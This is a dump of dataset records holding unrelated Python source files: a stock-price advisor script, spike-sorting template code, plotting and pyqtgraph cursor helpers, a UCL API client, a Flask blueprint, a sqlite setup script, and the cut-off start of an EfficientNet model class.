selected_stock.upper())\n print(\"*****************************************************\")\n print(\"REQUESTING STOCK MARKET DATA...\")\n print(\"REQUEST TIME: \" + \" \" + now.strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n print(\"*****************************************************\")\n print(f\"LATEST DAY: {last_refreshed}\")\n print(f\"LATEST CLOSE: {usd_price(float(last_closing_price))}\")\n print(f\"RECENT HIGH: {usd_price(float(recent_highest))}\")\n print(f\"RECENT LOW: {usd_price(float(recent_lowest))}\")\n\n print(\"*****************************************************\")\n print(\"YOU CAN ACCESS DATA VIA:\" + str(csv_file_path))\n print(\"*****************************************************\")\n print(\"*****************************************************\")\n print(\"*****************************************************\")\n\n while True:\n line_graph = input(\n \"IF A GRAPH WOULD BE HELPFUL PLEASE ENTER YES OR OTHERWISE PRESS ANY KEY TO CONTINUE FOR OTHER OPTIONS: \")\n if line_graph == \"YES\" or line_graph == \"yes\":\n print(\"*****************************************************\")\n print(\n \"AFTER VIEWING THE GRAPH, FOR MORE OPTIONS INCLUDING FREE ADVICE PLEASE EXIT WINDOW.\")\n print(\"*****************************************************\")\n closing_prices = []\n for cp in row:\n closing_prices.append(cp[\"close\"])\n graph_dates = sorted(dates)\n fig, ax = plt.subplots()\n\n # used https://matplotlib.org/3.1.1/gallery/ticks_and_spines/tick-locators.html for linearlocator\n ax.xaxis.set_major_locator(plt.LinearLocator(12))\n ax.yaxis.set_major_locator(plt.LinearLocator(6))\n\n # used https://matplotlib.org/3.1.1/gallery/pyplots/dollar_ticks.html for formatting to dollar sign\n formatter = ticker.FormatStrFormatter('$%1.2f')\n formatter2 = ticker.FuncFormatter(\n lambda x, p: format(int(x), ','))\n # used https://stackoverflow.com/questions/51734218/formatting-y-axis-matplotlib-with-thousands-separator-and-font-size\n ax.yaxis.set_major_formatter(formatter2)\n ax.yaxis.set_major_formatter(formatter)\n\n plt.plot(graph_dates, closing_prices)\n # used the Charts Excersize in class for line_graph\n\n plt.xlabel('Date', fontsize=12)\n plt.ylabel('Daily Close Price', fontsize=12)\n # referenced geeksforgeeks upper-lower input applications\n plt.title('Last Quarter Prices: ' +\n selected_stock.upper(), fontsize=18)\n plt.show()\n break\n else:\n break\n\n while True:\n advice_answer = input(\n \"WOULDYOU LIKE US TO EVALUATE THE RISK FOR YOU? PLEASE ENTER YES OR OTHERWISE PRESS ANY KEY TO CONTINUE FOR OTHER OPTIONS: \")\n if advice_answer == \"YES\" or advice_answer == \"yes\":\n if (float(last_closing_price)-float(recent_lowest))/float(last_closing_price) >= 0.30:\n print(\"*****************************************************\")\n print(\n \"INVESTMENT ADVICE: THIS IS A HIGH RISK STOCK. PLEASE BE CAUTIOUS! \")\n print(\"*****************************************************\")\n print(\n \"GOOD LUCK WITH YOUR INVESTMENTS PLEASE VISIT US AGAIN FOR MORE MARKET DRIVEN ADVICE ON STOCKS!\")\n print(\"******************************************************\")\n break\n elif (float(last_closing_price)-float(recent_lowest))/float(last_closing_price) >= 0.20:\n print(\"******************************************************\")\n print(\"INVESTMENT ADVICE: IN NORMAL CISRCUMSTANCES THIS WOULD BE CONSIDERED A HIGH RISK STOCK, CONSIDERING TODAY'S VOLATILE MARKETS, IT IS MEDIUM RISK, STILL BE CAUTIOUS! \")\n print(\"******************************************************\")\n print(\n \"GOOD LUCK WITH YOUR INVESTMENTS PLEASE VISIT US AGAIN FOR MORE MARKET DRIVEN ADVICE ON STOCKS!\")\n print(\"******************************************************\")\n break\n elif (float(last_closing_price)-float(recent_lowest))/float(last_closing_price) < 0.11:\n print(\"******************************************************\")\n print(\"iNVESTMENT ADVICE: THIS IS MED-LOW RISK STOCK. \")\n print(\"******************************************************\")\n print(\n \"GOOD LUCK WITH YOUR INVESTMENTS PLEASE VISIT US AGAIN FOR MORE MARKET DRIVEN ADVICE ON STOCKS!\")\n print(\"*******************************************************\")\n\n elif (float(last_closing_price)-float(recent_lowest))/float(last_closing_price) < 0.6:\n print(\"******************************************************\")\n print(\"INVESTMENT ADVICE: THIS IS LOW RISK STOCK \")\n print(\"******************************************************\")\n print(\n \"GOOD LUCK WITH YOUR INVESTMENTS PLEASE VISIT US AGAIN FOR MORE MARKET DRIVEN ADVICE ON STOCKS!\")\n print(\"*******************************************************\")\n\n else:\n exit()\n\n restart = input(\"if you would like to start over please enter YES?\")\n if restart == \"yes\" or restart == \"YES\":\n main()\n else:\n exit()\n\n\nmain()\n\n# to_emails = [To(\"em4063@ster.nyu.edu\")]\n# subject = \"E-Z Stock Acticity\"\n# # html_content = \"Hello, thank you for visiting us today. Below please find your search results for today:\"\n# message = Mail(from_email=MY_ADDRESS, to_emails=MY_ADDRESS,\n# subject=subject, html_content=html_content)\n\n# try:\n# response = client.send(message)\n\n# print(\"*****************************************************\")\n# # referenced geeksforgeeks upper-lower input applications\n# print(\"SELECTED SYMBOL:\" + selected_stock.upper())\n# print(\"*****************************************************\")\n# print(\"REQUESTING STOCK MARKET DATA...\")\n# print(\"REQUEST TIME: \" + \" \" + now.strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n# print(\"*****************************************************\")\n# print(f\"LATEST DAY: {last_refreshed}\")\n# print(f\"LATEST CLOSE: {usd_price(float(last_closing_price))}\")\n# print(f\"RECENT HIGH: {usd_price(float(recent_highest))}\")\n# print(f\"RECENT LOW: {usd_price(float(recent_lowest))}\")\n\n# print(\"*****************************************************\")\n# print(\"YOU CAN ACCESS DATA VIA:\" + str(csv_file_path))\n# print(\"*****************************************************\")\n# print(\"*****************************************************\")\n# print(\"*****************************************************\")\n# except Exception as e:\n# print(\"OOPS\", e.message)\n","sub_path":"app/robo_advisor2.py","file_name":"robo_advisor2.py","file_ext":"py","file_size_in_byte":13064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"333188575","text":"\"\"\"Class that provides some basic functions of wave forms.\"\"\"\n\nimport os\nimport numpy as np\nimport math\nimport logging\nimport parmap\n\nfrom scipy.interpolate import interp1d\nfrom scipy.spatial.distance import pdist, squareform\nfrom scipy import signal\n\nfrom yass import read_config\nfrom yass.reader import READER\nfrom yass.util import absolute_path_to_asset\n\nclass Geometry(object):\n \"\"\"Geometry Object for finidng closest channels.\"\"\"\n def __init__(self, geometry):\n self.geom = geometry\n self.pdist = squareform(pdist(geometry))\n\n def neighbors(self, channel, size):\n return np.argsort(self.pdist[channel, :])[:size]\n\n\nclass WaveForms(object):\n\n def __init__(self, wave_forms, geometry=None):\n \"\"\"Sets up and computes properties of wave forms.\n\n params:\n -------\n wave_forms: numpy.ndarray\n Shape of wave forms is (N, C, t). N is total number of wave forms\n C is number of channels and t is number of time points.\n geometry: numpy.ndarray\n Geometry of the probe that the wave forms belong to. Array has shape\n (N, 2) the coordinates of the probe.\n \"\"\"\n self.wave_forms = wave_forms\n self.n_unit, self.n_channel, self.n_time = self.wave_forms.shape\n self.unit_overlap = None\n self.pdist = None\n\n def pair_dist(self):\n \"\"\"Pairwise distance of templates to each other.\"\"\"\n if self.pdist is None: \n # Align all waveforms to the one with largest peak to peak.\n self.pdist = np.zeros([self.n_unit, self.n_unit]) + np.inf\n max_ptp_unit = self.ptp().argmax()\n vis_chan = self.vis_chan()\n al_wf = self.align(\n ref_wave_form=self.wave_forms[max_ptp_unit])\n for unit in range(self.n_unit):\n # Iterate over all units to find the best match.\n over_units = self.overlap()[unit]\n diff = al_wf[[unit]] - al_wf[over_units]\n diff = np.sqrt(np.square(diff).sum(axis=-1).sum(axis=-1))\n self.pdist[unit, over_units] = diff \n\n return self.pdist\n\n def __getitem__(self, key):\n return self.wave_forms.__getitem__(key)\n\n def svd_reconstruct(self, temp_id, rank=3):\n \"\"\"Reconstruct the wave forms by given id using SVD.\n\n params:\n -------\n temp_id: int or np.array\n template id(s) of the template to be reconstructed.\n rank: int\n Rank of the SVD reconstruction.\n\n returns:\n --------\n numpy.ndarray of shape (C, t) or (n, C, t) which is the SVD\n reconstructed version of the given wave forms.\n \"\"\"\n u, h, v = np.linalg.svd(self.wave_forms[temp_id, :, :])\n if len(u.shape) == 3:\n # Multiple units at a time.\n return np.matmul(u[:, :, :rank] * h[:, None, :rank], v[:, :rank, :])\n\n return np.matmul(u[:, :rank] * h[:rank], v[:rank, :])\n\n def vis_chan(self, threshold=2.):\n \"\"\"Computes boolean visibility matrix of the wave forms.\n\n params:\n -------\n threshold: float\n Threshold of visibility in terms of standard unit (SU).\n\n return:\n -------\n numpy.ndarray of shape (N, C).\n \"\"\"\n return self.wave_forms.ptp(axis=-1) > threshold\n\n def overlap(self, threshold=2.):\n \"\"\"Computes boolean spatial overlap of templates.\n\n params:\n -------\n threshold: float\n Threshold of visibility in terms of standard unit (SU).\n\n return:\n -------\n numpy.ndarray of shape (N, N).\n \"\"\"\n if self.unit_overlap is None:\n vis = self.vis_chan()\n self.unit_overlap = np.sum(\n np.logical_and(vis[:, None, :], vis[None, :, :]), axis=2)\n self.unit_overlap = self.unit_overlap > 0\n return self.unit_overlap\n \n def ptp(self):\n \"\"\"Returns ptp of wave forms in standard units.\n\n returns:\n --------\n numpy.array of size N.\n \"\"\"\n return self.wave_forms.ptp(axis=-1).max(axis=-1)\n\n def get_shifted_waveforms(self, shifts, clip_value):\n \"\"\"Get shifted viersions of the wave forms given the amount of shifts.\n\n params:\n -------\n shifts: float or np.array.float\n List of shifts that indicated how much has to change.\n\n returns:\n --------\n numpy.ndarray of shifted wave forms.\n \"\"\"\n unit_time_window = np.arange(\n self.n_time - 2 * clip_value) + shifts[:, None]\n default_range = np.arange(self.n_time - 2 * clip_value)\n sub_shifts = shifts - np.floor(shifts)\n shifts = np.floor(shifts).astype(np.int)\n\n def sub(i, shift, sub=None):\n if sub is None:\n return self.wave_forms[i, :, default_range + shift]\n return sub(i, shift) * sub + sub(i, shift + 1) * (1 - sub)\n\n if sub_shifts.sum() > 0.:\n # Linear interpolation.\n np.array(\n [sub(i, s, sub_shifts[i]) for i, s in enumerate(\n shifts)]).transpose([0, 2, 1])\n\n return np.array(\n [sub(i, s) for i, s in enumerate(shifts)]).transpose([0, 2, 1])\n\n def align(self, ref_wave_form=None, jitter=3, upsample=1):\n \"\"\"Aligns all the wave forms to the reference wave form.\n\n params:\n -------\n jitter: int\n How much jitter per wave form in subsample time is allowed.\n upsample: int\n Factor for interpolation of signals.\n \"\"\"\n if ref_wave_form is None:\n ref_wave_form = self.wave_forms.mean(axis=0)\n\n ptp = ref_wave_form.ptp(axis=1)\n max_chan = ptp.argmax()\n\n wf = self.wave_forms\n if upsample > 1:\n x_range = np.arange(0, self.n_time)\n f = interp1d(x_range, self.wave_forms)\n wf = f(x_range[:-1] + np.arange(0, 1, 1./upsample))\n\n # Upsample these guys\n ref = ref_wave_form[max_chan, jitter:-jitter]\n idx = np.arange(\n self.n_time - 2 * jitter) + np.arange(2 * jitter)[:, None]\n all_shifts = self.wave_forms[:, max_chan, idx]\n best_shift_idx = np.square(\n all_shifts - ref).sum(axis=-1).argmin(axis=-1)\n return self.get_shifted_waveforms(best_shift_idx, clip_value=jitter)\n\n\ndef update_templates(\n fname_templates,\n fname_spike_train,\n recordings_filename,\n recording_dtype,\n output_directory,\n rate=0.002,\n unit_ids=None):\n\n logger = logging.getLogger(__name__)\n\n CONFIG = read_config()\n\n # output folder\n if not os.path.exists(output_directory):\n os.makedirs(output_directory)\n\n fname_templates_updated = os.path.join(\n output_directory, 'templates_updated.npy')\n if os.path.exists(fname_templates_updated):\n return fname_templates_updated, None\n\n reader = READER(recordings_filename,\n recording_dtype,\n CONFIG)\n\n # max channel for each unit\n max_channels = np.load(fname_templates).ptp(1).argmax(1)\n fname_templates_new = run_template_computation(\n fname_spike_train,\n reader,\n output_directory,\n max_channels=max_channels,\n unit_ids=unit_ids,\n multi_processing=CONFIG.resources.multi_processing,\n n_processors=CONFIG.resources.n_processors)\n\n # load templates\n templates_orig = np.load(fname_templates)\n templates_new = np.load(fname_templates_new)\n\n n_units, n_times, n_channels = templates_orig.shape\n n_units_new = templates_new.shape[0]\n \n if unit_ids is None:\n unit_ids = np.arange(n_units)\n\n # if last few units have no spikes deconvovled, the length of new templates\n # can be shorter. then, zero pad it\n if n_units_new < n_units:\n zero_pad = np.zeros((n_units-n_units_new, n_times, n_channels), 'float32')\n templates_new = np.concatenate(\n (templates_new, zero_pad), axis=0)\n\n # number of deconvolved spikes\n n_spikes = np.zeros(n_units)\n units_unique, n_spikes_unique = np.unique(\n np.load(fname_spike_train)[:, 1], return_counts=True)\n n_spikes[units_unique] = n_spikes_unique\n\n # update rule if it will be updated\n weight_to_update = np.power((1 - rate), n_spikes)\n\n # only update for units in unit_ids \n weight = np.ones(n_units)\n weight[unit_ids] = weight_to_update[unit_ids]\n weight = weight[:, None, None]\n\n # align templates\n templates_orig, templates_new = align_two_set_of_templates(\n templates_orig, templates_new)\n\n # update and save\n templates_updated = weight*templates_orig + (1-weight)*templates_new\n np.save(fname_templates_updated, templates_updated)\n\n # check the difference\n max_diff = np.zeros(n_units)\n max_diff[unit_ids] = np.max(\n np.abs(templates_new[unit_ids] - templates_orig[unit_ids]),\n axis=(1,2))\n max_diff = max_diff/templates_orig.ptp(1).max(1)\n\n return fname_templates_updated, max_diff\n\n\ndef align_two_set_of_templates(templates1, templates2, ref_set=0):\n \n n_units = templates1.shape[0]\n \n for unit in range(n_units):\n temp = np.concatenate((templates1[[unit]],\n templates2[[unit]]),\n axis=0)\n aligned_temp, _ = align_templates(temp, ref_unit=ref_set)\n templates1[unit] = aligned_temp[0]\n templates2[unit] = aligned_temp[1]\n \n return templates1, templates2\n \n\ndef align_templates(templates, ref_unit=None):\n\n if ref_unit is None:\n max_idx = templates.ptp(1).max(1).argmax(0)\n ref_template = templates[max_idx]\n else:\n ref_template = templates[ref_unit]\n max_chan = ref_template.ptp(0).argmax(0)\n ref_template = ref_template[:, max_chan]\n \n\n temps = templates[:, :, max_chan]\n\n best_shifts = align_get_shifts_with_ref(\n temps, ref_template)\n\n aligned_templates = shift_chans(templates, best_shifts)\n \n return aligned_templates, best_shifts\n\n\ndef run_template_computation(\n fname_spike_train,\n reader,\n out_dir,\n max_channels=None,\n unit_ids=None,\n multi_processing=False,\n n_processors=1):\n\n logger = logging.getLogger(__name__)\n \n logger.info(\"computing templates\")\n\n # make output folder\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n \n fname_templates = os.path.join(out_dir, 'templates.npy')\n if os.path.exists(fname_templates):\n return fname_templates\n\n # make temp folder\n tmp_folder = os.path.join(out_dir, 'tmp_template')\n if not os.path.exists(tmp_folder):\n os.makedirs(tmp_folder)\n\n # partition spike train per unit for multiprocessing\n #fname_spike_times, n_units = partition_spike_time(\n # tmp_folder, fname_spike_train)\n\n n_units = np.max(np.load(fname_spike_train)[:, 1]) + 1\n\n if unit_ids is None:\n unit_ids = np.arange(n_units)\n\n # gather input arguments\n fnames_out = []\n for unit in unit_ids:\n fnames_out.append(os.path.join(\n tmp_folder,\n \"template_unit_{}.npy\".format(unit)))\n\n # max channels in\n if max_channels is not None:\n max_channels = list(max_channels[unit_ids])\n else:\n max_channels = [None for j in range(len(unit_ids))]\n \n # run computing function\n if multi_processing:\n parmap.starmap(run_template_computation_parallel,\n list(zip(unit_ids, max_channels, fnames_out)),\n fname_spike_train,\n reader,\n processes=n_processors,\n pm_pbar=True)\n else:\n for ctr in unit_ids:\n run_template_computation_parallel(\n fname_spike_train,\n max_channels[ctr],\n fnames_out[ctr],\n reader)\n\n # gather all info\n templates_new = np.zeros((n_units, reader.spike_size, reader.n_channels),\n 'float32')\n for ctr, unit in enumerate(unit_ids):\n if os.path.exists(fnames_out[ctr]):\n templates_new[unit] = np.load(fnames_out[ctr])\n\n np.save(fname_templates, templates_new)\n\n return fname_templates\n\n\ndef run_template_computation_parallel(\n unit_id, max_channel, fname_out, fname_spike_train, reader):\n\n if os.path.exists(fname_out):\n return\n\n # load spike times\n spike_train = np.load(fname_spike_train)\n spike_times = spike_train[spike_train[:, 1] == unit_id, 0]\n\n if len(spike_times) > 0:\n template = compute_a_template(spike_times,\n max_channel,\n reader)\n else:\n template = np.zeros(\n (reader.spike_size, reader.n_channels), 'float32')\n\n # save result\n np.save(fname_out, template)\n\n\ndef compute_a_template(spike_times, max_channel, reader):\n\n # subsample upto 1000\n max_spikes = 1000\n if len(spike_times) > max_spikes:\n spike_times = np.random.choice(a=spike_times,\n size=max_spikes,\n replace=False)\n\n # get waveforms\n wf, _ = reader.read_waveforms(spike_times)\n\n # max channel\n if max_channel is None:\n max_channel = np.mean(wf, axis=0).ptp(0).argmax()\n\n wf, _ = align_waveforms(wf=wf,\n max_channel=max_channel,\n upsample_factor=3,\n nshifts=3)\n\n return np.median(wf, axis=0).astype('float32')\n\ndef partition_spike_time(save_dir,\n fname_spike_index):\n\n # make directory\n if not os.path.isdir(save_dir):\n os.makedirs(save_dir)\n\n # load data\n spike_index = np.load(fname_spike_index)\n # re-organize spike times and templates id\n n_units = np.max(spike_index[:, 1]) + 1\n spike_index_list = [[] for ii in range(n_units)]\n for j in range(len(spike_index)):\n tt, ii = spike_index[j]\n spike_index_list[ii].append(tt)\n\n # save them\n fname = os.path.join(save_dir, 'spike_times.npy')\n np.save(fname, spike_index_list)\n\n return fname, n_units\n\ndef align_waveforms(wf, max_channel=None, upsample_factor=5, nshifts=7):\n\n # get shapes\n n_spikes, n_times, n_channels = wf.shape\n\n # mean shape and max channel\n mean_wf = np.mean(wf, axis=0)\n if max_channel is None:\n max_channel = mean_wf.ptp(0).argmax()\n\n shifts = align_get_shifts_with_ref(\n wf[:, :, max_channel], None, upsample_factor, nshifts)\n \n wf_aligned = shift_chans(wf, shifts)\n \n return wf_aligned, shifts\n \ndef align_get_shifts_with_ref(wf, ref=None, upsample_factor=5, nshifts=7):\n\n ''' Align all waveforms on a single channel\n \n wf = selected waveform matrix (# spikes, # samples)\n max_channel: is the last channel provided in wf \n \n Returns: superresolution shifts required to align all waveforms\n - used downstream for linear interpolation alignment\n '''\n # Cat: TODO: Peter's fix to clip/lengthen loaded waveforms to match reference templates \n n_data, n_time = wf.shape\n\n if ref is None:\n ref = np.mean(wf, axis=0)\n\n #n_time_rf = len(ref)\n #if n_time > n_time_rf:\n # left_cut = (n_time - n_time_rf)//2\n # right_cut = n_time - n_time_rf - left_cut\n # wf = wf[:, left_cut:-right_cut]\n #elif n_time < n_time_rf:\n # left_buffer = np.zeros((n_data, (n_time_rf - n_time)//2))\n # right_buffer = np.zeros((n_data,n_time_rf - n_time - left_buffer))\n # wf = np.concatenate((left_buffer, wf, right_buffer), axis=1)\n \n # convert nshifts from timesamples to #of times in upsample_factor\n nshifts = (nshifts*upsample_factor)\n if nshifts%2==0:\n nshifts+=1\n\n # or loop over every channel and parallelize each channel:\n #wf_up = []\n wf_up = upsample_resample(wf, upsample_factor)\n wlen = wf_up.shape[1]\n wf_start = nshifts//2\n wf_end = -nshifts//2\n \n wf_trunc = wf_up[:,wf_start:wf_end]\n wlen_trunc = wf_trunc.shape[1]\n \n # align to last chanenl which is largest amplitude channel appended\n ref_upsampled = upsample_resample(ref[np.newaxis], upsample_factor)[0]\n ref_shifted = np.zeros([wf_trunc.shape[1], nshifts])\n \n for i,s in enumerate(range(-(nshifts//2), (nshifts//2)+1)):\n ref_shifted[:,i] = ref_upsampled[s + wf_start: s + wf_end]\n\n bs_indices = np.matmul(wf_trunc[:,np.newaxis], ref_shifted).squeeze(1).argmax(1)\n best_shifts = (np.arange(-int((nshifts-1)/2), int((nshifts-1)/2+1)))[bs_indices]\n\n return best_shifts/np.float32(upsample_factor)\n\ndef upsample_resample(wf, upsample_factor):\n wf = wf.T\n waveform_len, n_spikes = wf.shape\n traces = np.zeros((n_spikes, (waveform_len-1)*upsample_factor+1),'float32')\n for j in range(wf.shape[1]):\n traces[j] = signal.resample(wf[:,j],(waveform_len-1)*upsample_factor+1)\n return traces\n\ndef shift_chans(wf, best_shifts):\n # use template feat_channel shifts to interpolate shift of all spikes on all other chans\n # Cat: TODO read this from CNOFIG\n wfs_final= np.zeros(wf.shape, 'float32')\n for k, shift_ in enumerate(best_shifts):\n if int(shift_)==shift_:\n ceil = int(shift_)\n temp = np.roll(wf[k],ceil,axis=0)\n else:\n ceil = int(math.ceil(shift_))\n floor = int(math.floor(shift_))\n temp = np.roll(wf[k],ceil,axis=0)*(shift_-floor)+np.roll(wf[k],floor, axis=0)*(ceil-shift_)\n wfs_final[k] = temp\n \n return wfs_final\n","sub_path":"src/yass/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":17729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"205698817","text":"import matplotlib.pyplot as plt\r\n# plt.style.use('ggplot') # 使用‘ggplot风格美化图表’\r\nplt.rcParams['font.sans-serif'] = ['SimHei'] # 步骤一(替换sans-serif字体)\r\nplt.rcParams['axes.unicode_minus'] = False # 步骤二(解决坐标轴负数的负号显示问题)\r\n\r\ndef frange(start,final,increment):\r\n numbers=[]\r\n while start len(self.parent.curves):\r\n raise ValueError('The curve you selected does not exist')\r\n self.refPlot = self.parent.curves[curveIndex] if curve is None else curve\r\n xStart = self.refPlot.xData[0]\r\n yStart = self.refPlot.yData[0]\r\n self.xRef = None\r\n self.yRef = None\r\n self.singleLine = '' \r\n if not xLine and not yLine:\r\n raise ValueError('You cannot create a cursor without a reference Line')\r\n if xLine:\r\n self.xRef = InfiniteLine(pos = xStart,angle = 90,movable = True, pen = cPen, bounds = [min(self.refPlot.xData),max(self.refPlot.xData)])\r\n self.parent.addItem(self.xRef)\r\n self.xRef.sigPositionChanged.connect(self.updateCursor)\r\n if not yLine:\r\n self.singleLine = 'self.refPlot.xData'\r\n if yLine:\r\n self.yRef = InfiniteLine(pos = yStart,angle = 0,movable = not xLine, pen = cPen, bounds = [min(self.refPlot.yData),max(self.refPlot.yData)])\r\n self.parent.addItem(self.yRef)\r\n if not xLine:\r\n self.yRef.sigPositionChanged.connect(self.updateCursor)\r\n self.singleLine = 'self.refPlot.yData'\r\n \r\n self.point = self.parent.plot([self.refPlot.xData[0]],[self.refPlot.yData[0]],pen = None, symbol = symb, symbolPen = cPen, symbolBrush = cPen)\r\n self.color = cPen\r\n self.symbol = symb\r\n if xLine and yLine:\r\n self.whoMovesWho = {self.xRef: [self.yRef,'self.refPlot.xData',0], self.yRef: [self.xRef,'self.refPlot.yData',1]}\r\n \r\n \r\n def updateCursor(self,evt):\r\n culprit = evt.sender()\r\n changedPos = culprit.pos()\r\n utilStr = 'where(array('\r\n newPoint = [0,0]\r\n if self.xRef is not None and self.yRef is not None:\r\n utilStr2 = ')>=changedPos[self.whoMovesWho[culprit][2]])[0][0]'\r\n toMove = self.whoMovesWho[culprit][0]\r\n baseStr = self.whoMovesWho[culprit][1]\r\n approxInd = eval(utilStr+baseStr+utilStr2)\r\n newValCulp = eval(baseStr+'['+str(approxInd)+']')\r\n newValMove = eval(self.whoMovesWho[toMove][1]+'['+str(approxInd)+']')\r\n newPoint[self.whoMovesWho[culprit][2]] = newValCulp\r\n newPoint[self.whoMovesWho[toMove][2]] = newValMove\r\n toMove.setPos(newPoint)\r\n culprit.sigPositionChanged.disconnect()\r\n culprit.setPos(newPoint)\r\n culprit.sigPositionChanged.connect(self.updateCursor)\r\n else:\r\n baseStr = self.singleLine\r\n utilStr2 = ')>=changedPos['+str(int(self.xRef is None))+'])[0][0]'\r\n approxInd = eval(utilStr+baseStr+utilStr2)\r\n newPoint[0] = self.refPlot.xData[approxInd]\r\n newPoint[1] = self.refPlot.yData[approxInd]\r\n \r\n self.point.setData([newPoint[0]],[newPoint[1]])\r\n self.moved.emit(newPoint)\r\n \r\n \r\n def pos(self):\r\n \r\n return [self.point.xData[0],self.point.yData[0]]\r\n\r\n\r\n def trafficLight(self,xLight,yLight):\r\n\r\n if self.xRef is not None:\r\n self.xRef.setMovable(xLight)\r\n if self.yRef is not None:\r\n self.yRef.setMovable(yLight)\r\n\r\n \r\n def suicide(self):\r\n \r\n if self.xRef is not None:\r\n self.parent.removeItem(self.xRef)\r\n if self.yRef is not None:\r\n self.parent.removeItem(self.yRef)\r\n \r\n self.parent.removeItem(self.point)","sub_path":"upfiles/EPiQ_2f_3.0.0/libs/cursor.py","file_name":"cursor.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"624940406","text":"import requests\nfrom urllib.parse import urljoin\n\nfrom .settings import supported_api_versions\nfrom .exception import InvalidAPIVersion\n\n\nclass Workspaces():\n def __init__(self, token, version='v0'):\n \"\"\"\n Args:\n version (string): specifies UCL API version.\n Default is 'v0'.\n Raises:\n InvalidAPIVersion: If UCL API version is not supported.\n \"\"\"\n try:\n self.base_url = supported_api_versions[version]\n except:\n raise InvalidAPIVersion\n\n self.token = token\n self.survey_url = urljoin(self.base_url, 'workspaces/surveys')\n self.sensors_url = urljoin(self.base_url, 'workspaces/sensors')\n self.averages_url = urljoin(self.base_url,\n 'workspaces/sensors/averages/time')\n self.updated_url = urljoin(self.base_url,\n 'workspaces/sensors/lastupdated')\n self.sensor_summary_url = urljoin(self.base_url,\n 'workspaces/sensors/summary')\n self.map_images_url = urljoin(self.base_url, 'workspaces/images/map')\n self.live_map_images_url = urljoin(self.map_images_url, '/live')\n\n def get_surveys(self):\n params = {\n \"token\": self.token,\n }\n survey = requests.get(self.survey_url, params=params)\n return survey.json()\n\n def get_sensor_by_survey(self, survey_id=\"46\",\n return_states=\"true\"):\n params = {\n \"token\": self.token,\n \"survey_id\": survey_id,\n \"return_states\": return_states,\n }\n\n sensor_survey = requests.get(self.sensors_url, params=params)\n return sensor_survey.json()\n\n def get_sensor_averages(self, days=\"30\", survey_ids=\"46,45\"):\n params = {\n \"token\": self.token,\n \"days\": days,\n \"survey_ids\": survey_ids,\n }\n sensor_averages = requests.get(self.averages_url, params=params)\n return sensor_averages.json()\n\n def get_sensor_last_update(self, survey_id=\"46\"):\n params = {\n \"token\": self.token,\n \"survey_id\": survey_id,\n }\n sensor_last_update = requests.get(self.updated_url,\n params=params)\n return sensor_last_update.json()\n\n def get_sensor_summary(self, survey_ids=\"46,45\"):\n params = {\n \"token\": self.token,\n \"survey_ids\": survey_ids,\n }\n sensor_summary = requests.get(self.sensor_summary_url,\n params=params)\n return sensor_summary.json()\n\n def get_map_images(self, image_id=\"79\", image_format=\"base64\"):\n params = {\n \"token\": self.token,\n \"image_id\": image_id,\n \"image_format\": image_format,\n }\n map_image = requests.get(self.map_images_url, params=params)\n return map_image.json()\n\n def get_map_images_with_seat_states(self, survey_id=\"22\",\n map_id=\"3\", image_scale=None,\n circle_radius=None,\n absent_colour=None,\n occupied_colour=None):\n params = {\n \"token\": self.token,\n \"survey_id\": survey_id,\n \"map_id\": map_id,\n \"image_scale\": image_scale,\n \"circle_radius\": circle_radius,\n \"absent_colour\": absent_colour,\n \"occupied_colour\": occupied_colour,\n }\n map_images_seat_states = requests.get(self.live_map_images_url,\n params=params)\n return map_images_seat_states.json()\n","sub_path":"uclapi/workspaces.py","file_name":"workspaces.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"114800257","text":"from views import homepage\n\nfrom flask import Blueprint, url_for\n\nblog_bp = Blueprint('blog', __name__,\n url_prefix='',\n subdomain='blog')\n\n\nblog_bp.add_url_rule('/', view_func=homepage, methods=['GET'])\nblog_bp.add_url_rule('/index', view_func=homepage, methods=['GET'])\n","sub_path":"resources/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"506329896","text":"import sqlite3\n\nconn = sqlite3.connect('zadanie09_baza.db')\n\nc = conn.cursor()\n\nzapytanie = \"\"\"\nCREATE TABLE \"zwierzaki\" (\n \"id\"\tINTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,\n \"imie\"\tTEXT NOT NULL,\n \"gatunek\"\tTEXT,\n \"wiek\"\tREAL\n);\n\"\"\"\n\nc.execute(zapytanie)\n\nconn.commit()\nconn.close()\n","sub_path":"Python - advanced/zajecia09/0901_create_rozwiązanie.py","file_name":"0901_create_rozwiązanie.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"465947203","text":"import timm\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport torch.nn.functional as F\nfrom timm.models.efficientnet import *\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n\n e = tf_efficientnetv2_l(pretrained=True, drop_rate=0.55, drop_path_rate=0.5)\n self.b0 = nn.Sequential(\n e.conv_stem,\n e.bn1,\n e.act1,\n )\n self.b1 = e.blocks[0]\n self.b2 = e.blocks[1]\n self.b3 = e.blocks[2]\n self.b4 = e.blocks[3]\n self.b5 = e.blocks[4]\n self.b6 = e.blocks[5]\n self.b7 = e.blocks[6]\n self.b8 = nn.Sequential(\n e.conv_head, #384, 1536\n e.bn2,\n e.act2\n )\n# self.act2 = F.sigmoid()\n \n self.logit = nn.Sequential(\n nn.Linear(1280, 512),\n nn.SiLU(inplace=True),\n nn.BatchNorm1d(512),\n nn.Linear(512, num_study_label)\n )\n self.mask = nn.Sequential(\n nn.Conv2d(384, 128, kernel_size=3, padding=1),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True),\n nn.Conv2d(128, 128, kernel_size=3, padding=1),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True),\n nn.Conv2d(128, 1, kernel_size=1, padding=0),\n )\n\n\n # @torch.cuda.amp.autocast()\n def 